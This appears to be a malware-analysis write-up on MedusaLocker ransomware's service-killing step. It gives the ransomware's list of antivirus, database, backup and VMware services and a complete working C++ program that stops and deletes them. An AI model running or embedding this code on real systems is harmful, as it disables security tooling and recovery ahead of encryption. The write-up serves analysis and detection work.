MalwareAnalysisSeries

This repository contains analysis reports, technical write-ups and tools created to help with malware analysis. It also contains extracted TTPs implemented as code, together with the corresponding detection rules.


Project maintained by shaddy43 Hosted on GitHub Pages — Theme by mattgraham

MedusaLocker: Service Stop


Ransomware typically kills services running in a system to maximize its impact and increase the likelihood of a ransom payment. By terminating services related to antivirus and security software, ransomware can avoid detection and prevent its removal, allowing it to encrypt files without interference. Disabling database services and backup solutions ensures that organizations cannot easily restore their data from backups, thereby amplifying the pressure to pay the ransom. Additionally, stopping critical business services disrupts operations, causing significant downtime and financial loss. This combination of tactics—disabling security measures, hindering recovery efforts, and causing operational disruption—creates a dire situation for the victim, making them more likely to comply with the attackers’ demands to regain control of their systems and data.

MedusaLocker likewise carries a hard-coded list of service names that it stops and then deletes before launching the encryption routine. One detail worth checking when reading such a list: OpenServiceW takes the service's key name, not its display name or executable name. Entries such as sqlservr and sqlagent are binary names (the default SQL Server services are registered as MSSQLSERVER and SQLSERVERAGENT, or MSSQL$<instance> and SQLAgent$<instance> for named instances), so on a standard install those lookups fail and the loop below simply moves on to the next entry.

Implementation

Pre-defined List of Services

LPCWSTR serviceNames[] = {
    L"wrapper",
    L"DefWatch", 
    L"ccEvtMgr",
    L"ccSetMgr",
    L"SavRoam",
    L"sqlservr",
    L"sqlagent",
    L"sqladhlp",
    L"Culserver",
    L"RTVscan",
    L"sqlbrowser",
    L"SQLADHLP",
    L"QBIDPService",
    L"Intuit.QuickBooks.FCS",
    L"QBCFMonitorService",
    L"sqlwriter",
    L"msmdsrv",
    L"tomcat6",
    L"zhudongfangyu",
    L"SQLADHLP",
    L"vmware-usbarbitator64",
    L"vmware-converter",
    L"dbsrv12"
};

Get Handle of Service Control Manager

To interact with services installed on a system, we first open a handle to the Service Control Manager (SCM). SC_MANAGER_CONNECT is all that is needed to open individual services; the per-service rights requested later (SERVICE_STOP and DELETE) are what require an administrative token, so this stage of the sample only works when it runs elevated.

SC_HANDLE schSCManager = OpenSCManagerW(NULL, NULL, SC_MANAGER_CONNECT);
if (schSCManager == NULL)
{
    std::cerr << "Failed to open service control manager\n";
    return -1;
}

Stop Services

To stop a service, we open a handle to it with OpenServiceW, requesting SERVICE_STOP, SERVICE_QUERY_STATUS and DELETE in one call so the same handle can be reused for the deletion step. ControlService with the SERVICE_CONTROL_STOP control code asks the service to stop; it returns as soon as the request has been delivered, not when the service has actually stopped, so a careful implementation would poll QueryServiceStatusEx until dwCurrentState reaches SERVICE_STOPPED (the sample does not). Before sending the control, QueryServiceStatus is used to check that the service is running or paused, since stopping an already stopped service would only produce an error.

SC_HANDLE schService = OpenServiceW(schSCManager, serviceName, SERVICE_STOP | SERVICE_QUERY_STATUS | DELETE);
if (schService == NULL)
{
    std::cerr << "Failed to open service or service unavailable " << serviceName << "\n";
    continue;
}

SERVICE_STATUS status;
if (QueryServiceStatus(schService, &status))
{
    if (status.dwCurrentState == SERVICE_RUNNING || status.dwCurrentState == SERVICE_PAUSED)
    {
        std::cout << "Stopping service " << serviceName << "...\n";
        if (ControlService(schService, SERVICE_CONTROL_STOP, &status))
            std::cout << "Service " << serviceName << " stopped successfully\n";
        else
            std::cerr << "Failed to stop service " << serviceName << "\n";
    }
}

Deleting Services

After stopping a service, MedusaLocker deletes it from the victim system using the same handle and the DeleteService API. DeleteService only marks the service for deletion: the SCM removes its registry key once the service has stopped and every open handle to it, including the one still held here, has been closed. Until then, a further OpenService call on that name fails with ERROR_SERVICE_MARKED_FOR_DELETION.

std::cout << "Deleting service " << serviceName << "...\n";
if (DeleteService(schService))
    std::cout << "Service " << serviceName << " deleted successfully\n";
else
    std::cerr << "Failed to delete service " << serviceName << "\n";

// Closing the last handle is what lets the SCM complete the deletion.
CloseServiceHandle(schService);

Stop & Delete Services in a Loop

Since the pre-defined list of services is available in an array, we loop through it and apply the stop-and-delete sequence above to each entry.

#include <windows.h>
#include <iostream>
#include <string>

// serviceNames[] is the array defined above.

// Narrow a wide service name for std::cout. The repository's full source defines its
// own convert_to_printable; this stand-in (assumed here) keeps the snippet self-contained.
static std::string convert_to_printable(LPCWSTR wide)
{
    std::string out;
    for (const wchar_t* p = wide; *p; ++p)
        out += (*p < 128) ? static_cast<char>(*p) : '?';
    return out;
}

int main()
{
    // SC_MANAGER_CONNECT is enough to open individual services.
    SC_HANDLE schSCManager = OpenSCManagerW(NULL, NULL, SC_MANAGER_CONNECT);
    if (schSCManager == NULL)
    {
        std::cerr << "Failed to open service control manager\n";
        return -1;
    }

    const int numServices = sizeof(serviceNames) / sizeof(serviceNames[0]);
    for (int i = 0; i < numServices; ++i)
    {
        // Request stop, query and delete rights in one call so the same handle
        // serves both steps. Fails for services that are not installed.
        SC_HANDLE schService = OpenServiceW(schSCManager, serviceNames[i], SERVICE_STOP | SERVICE_QUERY_STATUS | DELETE);
        if (schService == NULL)
        {
            std::cerr << "Failed to open service or service unavailable " << convert_to_printable(serviceNames[i]) << "\n";
            continue;
        }

        SERVICE_STATUS status;
        if (QueryServiceStatus(schService, &status))
        {
            // Only send a stop control to services that are running or paused.
            if (status.dwCurrentState == SERVICE_RUNNING || status.dwCurrentState == SERVICE_PAUSED)
            {
                std::cout << "Stopping service " << convert_to_printable(serviceNames[i]) << "...\n";
                // ControlService returns once the request is delivered, not once the service has stopped.
                if (ControlService(schService, SERVICE_CONTROL_STOP, &status))
                    std::cout << "Service " << convert_to_printable(serviceNames[i]) << " stopped successfully\n";
                else
                    std::cerr << "Failed to stop service " << convert_to_printable(serviceNames[i]) << "\n";
            }
        }
        else
        {
            // Close the handle before skipping so it is not leaked.
            CloseServiceHandle(schService);
            continue;
        }

        // DeleteService marks the service for deletion; the SCM removes it once it has
        // stopped and all handles are closed.
        std::cout << "Deleting service " << convert_to_printable(serviceNames[i]) << "...\n";
        if (DeleteService(schService))
            std::cout << "Service " << convert_to_printable(serviceNames[i]) << " deleted successfully\n";
        else
            std::cerr << "Failed to delete service " << convert_to_printable(serviceNames[i]) << "\n";

        CloseServiceHandle(schService);
    }
    CloseServiceHandle(schSCManager);
    return 0;
}

The complete code is available here: Shaddy43/MalwareAnalaysisSeries

Disclaimer

Intended for educational purposes only!